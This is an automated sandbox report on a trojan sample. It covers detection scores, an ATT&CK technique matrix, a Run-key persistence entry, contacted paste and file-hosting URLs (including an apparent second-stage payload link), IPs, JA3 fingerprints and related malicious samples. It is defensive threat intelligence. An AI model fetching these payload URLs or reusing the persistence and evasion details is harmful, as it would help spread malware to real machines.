Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation

Source: C:\Users\user\Desktop\9K25QyJ4hA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	11 Process Injection	11 Disable or Modify Tools	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	3 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
9K25QyJ4hA.exe	30%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
9K25QyJ4hA.exe	38%	Virustotal		Browse
9K25QyJ4hA.exe	100%	Avira	TR/Redcap.yqlbn
9K25QyJ4hA.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://crl.microsoft	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://oshi.at	0%	Avira URL Cloud	safe
https://paste.fo/raw/015dbe46ef97	0%	Avira URL Cloud	safe
https://oshi.at/tqJAc/blueloqder.bin	0%	Avira URL Cloud	safe
https://paste.fo/raw/015dbe46ef97T	0%	Avira URL Cloud	safe
http://paste.fod	0%	Avira URL Cloud	safe
https://oshi.at	0%	Avira URL Cloud	safe
http://paste.fo	0%	Avira URL Cloud	safe
http://crl.microsoftz;	0%	Avira URL Cloud	safe
https://paste.fo	0%	Avira URL Cloud	safe
http://oshi.atd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
oshi.at	5.253.86.15	true	false		unknown
paste.fo	104.21.70.240	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.fo/raw/015dbe46ef97	false	Avira URL Cloud: safe	unknown
https://oshi.at/tqJAc/blueloqder.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1393730766.000000000542B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1498004369.0000000006079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	false		high
http://oshi.at	9K25QyJ4hA.exe, 00000000.00000002.1463895036.000000000251F000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000312E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.1390973844.0000000004515000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1487824101.0000000005162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000002.00000002.1395903363.0000000007044000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/somenonymous/OshiUpload	9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002578000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024F6000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.0000000003106000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.0000000003187000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oshi.at	9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024FE000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.7.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	false		high
http://oshi.atd	9K25QyJ4hA.exe, 00000000.00000002.1463895036.000000000251F000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.000000000312E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 00000010.00000002.1598807950.00000000080D2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1390973844.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1487824101.0000000005011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1570273733.00000000045D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.fo	9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002451000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.00000000030D2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.1390973844.0000000004515000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1487824101.0000000005162000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1570273733.0000000004721000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1393730766.000000000542B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1498004369.0000000006079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1588412225.0000000005639000.00000004.00000800.00020000.00000000.sdmp	false		high
http://paste.fod	9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.00000000030E4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://paste.fo	9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.00000000030E4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.fo/raw/015dbe46ef97T	9K25QyJ4hA.exe, 00000000.00000002.1463895036.0000000002451000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.0000000003099000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	9K25QyJ4hA.exe, 00000000.00000002.1463895036.00000000024C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1390973844.00000000043C1000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000009.00000002.1536959660.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1487824101.0000000005011000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 0000000F.00000002.1844412825.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1570273733.00000000045D1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoftz;	powershell.exe, 00000010.00000002.1598807950.00000000080D2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.70.240	paste.fo	United States		13335	CLOUDFLARENETUS	false
5.253.86.15	oshi.at	Cyprus		208046	HOSTSLICK-GERMANYNL	false

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1356250
Start date and time:	2023-12-08 14:28:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9K25QyJ4hA.exe renamed because original name is a hash value
Original Sample Name:	b5858b684b93cec0c56768fda67e721595bdfa7d14dbf45b74abbf686c9b66a2.exe
Detection:	MAL
Classification:	mal72.evad.winEXE@15/26@2/2
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 100% Number of executed functions: 144 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 9K25QyJ4hA.exe, PID 5440 because it is empty
Execution Graph export aborted for target 9K25QyJ4hA.exe, PID 7384 because it is empty
Execution Graph export aborted for target 9K25QyJ4hA.exe, PID 7944 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:28:56	API Interceptor	318x Sleep call for process: 9K25QyJ4hA.exe modified
14:28:56	API Interceptor	36x Sleep call for process: powershell.exe modified
14:28:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BlockHost.exe C:\Users\user\Desktop\9K25QyJ4hA.exe
14:29:05	API Interceptor	3x Sleep call for process: WerFault.exe modified
14:29:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BlockHost.exe C:\Users\user\Desktop\9K25QyJ4hA.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.70.240	https://hp49wqdw7g43qv1i4n88.nh6hd1s.ru/8tnf/	Get hash	malicious	Unknown	Browse
5.253.86.15	PAYMENT_RECEIPT_STAN100699.exe	Get hash	malicious	Unknown	Browse
	PAYMENT_RECEIPT_STAN100699.exe	Get hash	malicious	Unknown	Browse
	VGuSHbkIxk.exe	Get hash	malicious	Amadey, Djvu, Fabookie, RedLine, SmokeLoader	Browse
	wauCcRjr6j.exe	Get hash	malicious	Djvu, RedLine, SmokeLoader	Browse
	KvVXVfYvlF.exe	Get hash	malicious	BlackGuard, SmokeLoader	Browse
	BHHh.exe	Get hash	malicious	Unknown	Browse
	SCAN_DOC_003930_doc.exe	Get hash	malicious	Unknown	Browse
	PO_756380.js	Get hash	malicious	Unknown	Browse
	PO_756380.js	Get hash	malicious	Unknown	Browse
	nxIBGfk1rr.exe	Get hash	malicious	RedLine	Browse
	lvm.exe.exe	Get hash	malicious	CobaltStrike	Browse
	KJkj2S7Clo.exe	Get hash	malicious	SmokeLoader	Browse
	Draft_Document.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	RedLine	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
oshi.at	PAYMENT_RECEIPT_STAN100699.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	PAYMENT_RECEIPT_STAN100699.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	VGuSHbkIxk.exe	Get hash	malicious	Amadey, Djvu, Fabookie, RedLine, SmokeLoader	Browse	5.253.86.15
	wauCcRjr6j.exe	Get hash	malicious	Djvu, RedLine, SmokeLoader	Browse	5.253.86.15
	KvVXVfYvlF.exe	Get hash	malicious	BlackGuard, SmokeLoader	Browse	5.253.86.15
	BHHh.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	SCAN_DOC_003930_doc.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	PO_756380.js	Get hash	malicious	Unknown	Browse	5.253.86.15
	PO_756380.js	Get hash	malicious	Unknown	Browse	5.253.86.15
	nxIBGfk1rr.exe	Get hash	malicious	RedLine	Browse	5.253.86.15
	lvm.exe.exe	Get hash	malicious	CobaltStrike	Browse	5.253.86.15
	KJkj2S7Clo.exe	Get hash	malicious	SmokeLoader	Browse	5.253.86.15
	Draft_Document.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	file.exe	Get hash	malicious	RedLine	Browse	5.253.86.15
	rr.exe	Get hash	malicious	RedLine	Browse	51.68.141.111
	HuJLbnfEq3.exe	Get hash	malicious	Nymaim, RedLine	Browse	51.68.141.111
	b82af5f52e227885b6c58f785785481372a9432e415f4.exe	Get hash	malicious	RedLine	Browse	51.68.141.111
	5ASHKzytkq.exe	Get hash	malicious	RedLine, Vidar	Browse	51.68.141.111
	Vde6wWF1N3.exe	Get hash	malicious	RedLine	Browse	51.68.141.111
	INV0100.js	Get hash	malicious	Unknown	Browse	51.68.141.111

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOSTSLICK-GERMANYNL	COTA#U00c7#U00c3O MAGNA LTDA MFOC231877756745758450045Hemihedrism.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.142.59.81
	IMG_WAA00020237535050030500000324Ridderlfte.exe	Get hash	malicious	GuLoader	Browse	193.142.59.81
	rCOTA____OMAGNA.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.142.59.81
	IMG-WAA023-202311027935732345535325453Generalisables.vbs	Get hash	malicious	GuLoader, Remcos	Browse	193.142.59.81
	rCOTA____OMAGNALTDAMFOC231877756745758450045.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.142.59.81
	rIMG-WAA0211202.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.142.59.81
	SecuriteInfo.com.Win32.RATX-gen.21306.22425.exe	Get hash	malicious	Remcos	Browse	193.142.59.240
	PAYMENT_RECEIPT_STAN100699.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	PAYMENT_RECEIPT_STAN100699.exe	Get hash	malicious	Unknown	Browse	5.253.86.15
	Yegdeajzb.exe	Get hash	malicious	Remcos	Browse	193.142.59.240
	PRICE_CHART_AND_MORE_DETAILS.exe	Get hash	malicious	Remcos	Browse	193.142.59.6
	ZH-SA_5012023.exe	Get hash	malicious	Remcos, GuLoader	Browse	193.142.59.6
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	193.142.59.12
	8t7XJHwvkR.exe	Get hash	malicious	LummaC Stealer, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	193.142.59.12
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	193.142.59.12
CLOUDFLARENETUS	https://ndlc.us21.list-manage.com/track/click?u=c019ce2ced9d9c49756fb7da7&id=21b55f31be&e=398702c985	Get hash	malicious	HTMLPhisher	Browse	104.21.80.18
	svo0k2D8I1.exe	Get hash	malicious	FormBook	Browse	104.21.90.183
	https://ndlc.us21.list-manage.com/track/click?u=c019ce2ced9d9c49756fb7da7&id=21b55f31be&e=398702c985	Get hash	malicious	HTMLPhisher	Browse	104.21.80.18
	Payment_45832.html	Get hash	malicious	Unknown	Browse	104.18.7.145
	https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=Ebb0j5QjXU-qQZYFfJozDJWY2o9D5BtLjngmk2mcQBRUQjVGQ1czU1BKSEZESVo0VENZT0UxR1dQQy4u&vt=8ff4b611-2394-4f5d-aa41-96057c9a330c_898deb5f-42fb-4f38-8d3d-fdd88a6aeed6_638376144220000000_EUR_Hash_MiEjQryDmSP0Q5%2bsfWmmkF1mqEGpCWipqllkfFFe3vg%3d&lang=en-us	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	xyoRhY7Rkm.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	Order_NO.Z21239.js	Get hash	malicious	Remcos	Browse	172.67.215.45
	K25Eh2b6Mb.exe	Get hash	malicious	FormBook	Browse	104.21.13.73
	n5PW3tuGlp.exe	Get hash	malicious	FormBook	Browse	172.67.169.151
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	172.67.135.47
	https://i.nupem.ufrj.br/Jakro_7DJSD	Get hash	malicious	HTMLPhisher	Browse	104.21.80.104
	SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exe	Get hash	malicious	AsyncRAT, Clipboard Hijacker	Browse	162.159.135.233
	kJQ1ZHLjG3.exe	Get hash	malicious	Unknown	Browse	104.21.31.179
	kJQ1ZHLjG3.exe	Get hash	malicious	Unknown	Browse	104.21.31.179
	Google_Gemini_AI_Ultra_v1.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	172.67.196.133
	http://arsyology.xyz/gYefq09	Get hash	malicious	Unknown	Browse	104.26.9.44
	https://t.co/XbiWikRFDe	Get hash	malicious	Phisher	Browse	104.21.80.104
	sslbV3ugVh.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, zgRAT	Browse	104.21.6.189
	904NFECOM.lnk	Get hash	malicious	Unknown	Browse	172.67.212.7

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	rJASBillOfLading-TPE36494384_PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.70.240 5.253.86.15
	KujreNfyEy.exe	Get hash	malicious	AgentTesla	Browse	104.21.70.240 5.253.86.15
	q9JMM7QERu.exe	Get hash	malicious	AgentTesla	Browse	104.21.70.240 5.253.86.15
	TBSRZVcVcm.exe	Get hash	malicious	Unknown	Browse	104.21.70.240 5.253.86.15
	xyoRhY7Rkm.exe	Get hash	malicious	AgentTesla	Browse	104.21.70.240 5.253.86.15
	oPQOKqascb.exe	Get hash	malicious	AgentTesla	Browse	104.21.70.240 5.253.86.15
	lXUdtmFlwL.exe	Get hash	malicious	AgentTesla	Browse	104.21.70.240 5.253.86.15
	Order_NO.Z21239.js	Get hash	malicious	Remcos	Browse	104.21.70.240 5.253.86.15
	SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exe	Get hash	malicious	AsyncRAT, Clipboard Hijacker	Browse	104.21.70.240 5.253.86.15
	kJQ1ZHLjG3.exe	Get hash	malicious	Unknown	Browse	104.21.70.240 5.253.86.15
	kJQ1ZHLjG3.exe	Get hash	malicious	Unknown	Browse	104.21.70.240 5.253.86.15
	http://arsyology.xyz/gYefq09	Get hash	malicious	Unknown	Browse	104.21.70.240 5.253.86.15
	6966406086.vbs	Get hash	malicious	XWorm	Browse	104.21.70.240 5.253.86.15
	https://79968e9b.6ad65e5283e89d8125e9a66c.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.21.70.240 5.253.86.15
	afro76tyg.exe	Get hash	malicious	AgentTesla	Browse	104.21.70.240 5.253.86.15
	tmpBA1E.html	Get hash	malicious	HTMLPhisher	Browse	104.21.70.240 5.253.86.15
	tmp1F2B.html	Get hash	malicious	HTMLPhisher	Browse	104.21.70.240 5.253.86.15
	TRNX9876567DLH899897.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.21.70.240 5.253.86.15
	TRNX9876567DLH899897.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.21.70.240 5.253.86.15
	ddmze3fN5n.exe	Get hash	malicious	Unknown	Browse	104.21.70.240 5.253.86.15

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9K25QyJ4hA.exe_66ad3eb6a3ee976962d7f58fe0ffe93798e6ded_54246e41_2dc6c65a-1972-4697-8d1f-6f19cc1296ab\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1832112991370438
Encrypted:	false
SSDEEP:	192:/QBtkGDbOf0BU/KayHFA/fkzuiF4Z24IO8G:oBrDblBU/KaQq3kzuiF4Y4IO8G
MD5:	867CCE254FA79B7E93D98DC6BAB21CAB
SHA1:	86B8A8DF4195BB940D4C88F9DC0E957687D6B5E0
SHA-256:	D0F27604620698C62C0B56760B55D3A6CAA234CACF8601574957FC3C4986FB2A
SHA-512:	43BA74619F40364CD5A991D72D81705F135E69E65606192C8FE910AA1D39ED9A32D5972B0824550FF0CDC566F8794C34A203C5B91DD15E5CA3DD56B4DCCE0222
Malicious:	false
Reputation:	low
